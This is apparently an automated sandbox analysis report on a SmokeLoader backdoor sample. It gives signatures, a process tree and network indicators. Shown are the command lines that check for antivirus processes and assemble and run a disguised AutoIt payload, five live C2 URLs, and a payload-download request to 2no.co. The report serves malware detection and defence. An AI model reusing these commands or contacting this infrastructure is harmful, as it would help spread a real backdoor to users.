Edit tour

Windows Analysis Report
lSmb6nDsrC.exe

Overview

General Information

Sample name:	lSmb6nDsrC.exe renamed because original name is a hash value
Original sample name:	83741bbca9631aa4925203fbddc0ad7d.exe
Analysis ID:	1478963
MD5:	83741bbca9631aa4925203fbddc0ad7d
SHA1:	f636ef4f3279cd49d1036a70293f8390ecc96a3e
SHA256:	538af0e39f24f16e4e52cad03295a359304d8f458c1fe18d0681e884112f2185
Tags:	exe
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Drops PE files with a suspicious file extension

Found API chain indicative of debugger detection

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

lSmb6nDsrC.exe (PID: 5084 cmdline: "C:\Users\user\Desktop\lSmb6nDsrC.exe" MD5: 83741BBCA9631AA4925203FBDDC0AD7D)

cmd.exe (PID: 2080 cmdline: "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3868 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5408 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 4668 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6880 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5872 cmdline: cmd /c md 55116385 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 1720 cmdline: findstr /V "SlutSteLouisTranslation" Cyprus MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6856 cmdline: cmd /c copy /b Breeding + Fuji + Weather 55116385\s MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Labs.pif (PID: 7244 cmdline: 55116385\Labs.pif 55116385\s MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)

Labs.pif (PID: 8056 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)

explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

PING.EXE (PID: 7272 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: 55116385\Labs.pif 55116385\s, CommandLine: 55116385\Labs.pif 55116385\s, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2080, ParentProcessName: cmd.exe, ProcessCommandLine: 55116385\Labs.pif 55116385\s, ProcessId: 7244, ProcessName: Labs.pif

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2080, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 6880, ProcessName: findstr.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: lSmb6nDsrC.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://cellc.org/tmp/index.php	Avira URL Cloud: Label: malware
Source: https://2no.co/MR)	Avira URL Cloud: Label: malware
Source: https://2no.co/16G965ZC	Avira URL Cloud: Label: malware
Source: http://piratia.su/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://piratia-life.ru/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://icebrasilpr.com/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://h-c-v.ru/tmp/index.php	Avira URL Cloud: Label: malware
Source: https://2no.co/16G965	Avira URL Cloud: Label: malware
Source: https://2no.co/hR	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}

Multi AV Scanner detection for domain / URL

Source: http://cellc.org/tmp/index.php	Virustotal: Detection: 21%	Perma Link
Source: http://piratia.su/tmp/index.php	Virustotal: Detection: 15%	Perma Link
Source: http://piratia-life.ru/tmp/index.php	Virustotal: Detection: 15%	Perma Link
Source: http://h-c-v.ru/tmp/index.php	Virustotal: Detection: 23%	Perma Link
Source: http://icebrasilpr.com/tmp/index.php	Virustotal: Detection: 19%	Perma Link

Multi AV Scanner detection for submitted file

Source: lSmb6nDsrC.exe	Virustotal: Detection: 68%			Perma Link
Source: lSmb6nDsrC.exe	ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: lSmb6nDsrC.exe

Joe Sandbox ML: detected

Source: lSmb6nDsrC.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.7:49703 version: TLS 1.2

Source: lSmb6nDsrC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Code function: 0_2_0040687E FindFirstFileW,FindClose,	0_2_0040687E
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Code function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C2D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_007D4005
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_007D494A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_007DC2FF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DCD14 FindFirstFileW,FindClose,	19_2_007DCD14
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_007DCD9F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_007DF5D8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_007DF735
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_007DFA36
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_007D3CE2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_007D4005
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_007DC2FF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose,	27_2_007D494A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DCD14 FindFirstFileW,FindClose,	27_2_007DCD14
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	27_2_007DCD9F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_007DF5D8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_007DF735
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_007DFA36
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_007D3CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://cellc.org/tmp/index.php
Source: Malware configuration extractor	URLs: http://h-c-v.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://icebrasilpr.com/tmp/index.php
Source: Malware configuration extractor	URLs: http://piratia-life.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://piratia.su/tmp/index.php

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1

Source: Joe Sandbox View

IP Address: 104.21.79.229 104.21.79.229

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007E29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

19_2_007E29BA

Source: global traffic

HTTP traffic detected: GET /16G965 HTTP/1.1User-Agent: SkHost: 2no.co

Source: global traffic	DNS traffic detected: DNS query: 2no.co
Source: global traffic	DNS traffic detected: DNS query: UaTVQmthThJ.UaTVQmthThJ
Source: global traffic	DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa

Source: explorer.exe, 0000001C.00000002.2481065121.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lSmb6nDsrC.exe	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: lSmb6nDsrC.exe	String found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: lSmb6nDsrC.exe	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: lSmb6nDsrC.exe	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: explorer.exe, 0000001C.00000002.2481065121.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000001C.00000002.2481065121.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lSmb6nDsrC.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 0000001C.00000002.2481065121.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: lSmb6nDsrC.exe	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: lSmb6nDsrC.exe	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: lSmb6nDsrC.exe, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: lSmb6nDsrC.exe	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: explorer.exe, 0000001C.00000002.2483780350.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2483829342.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2482661406.0000000007C70000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: lSmb6nDsrC.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: lSmb6nDsrC.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: lSmb6nDsrC.exe	String found in binary or memory: http://www.aimp.ru0
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000000.1277873491.0000000000839000.00000002.00000001.01000000.00000006.sdmp, Labs.pif, 0000001B.00000000.2191675925.0000000000839000.00000002.00000001.01000000.00000006.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000001C.00000002.2481065121.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: Labs.pif, 00000013.00000003.2252607198.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000002.2257598808.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2no.co/16G965
Source: Labs.pif, 00000013.00000003.2252607198.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000002.2257598808.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2no.co/16G965ZC
Source: Labs.pif, 00000013.00000002.2257484669.0000000001514000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252929645.000000000150D000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252820608.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2no.co/MR)
Source: Labs.pif, 00000013.00000002.2257484669.0000000001514000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252929645.000000000150D000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000003.2252820608.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2no.co/hR
Source: explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000001C.00000002.2484651579.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307967181.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000001C.00000002.2484651579.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001C.00000002.2484651579.0000000008DA6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000001C.00000000.2307149631.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000001C.00000000.2299433125.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 0000001C.00000000.2307149631.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
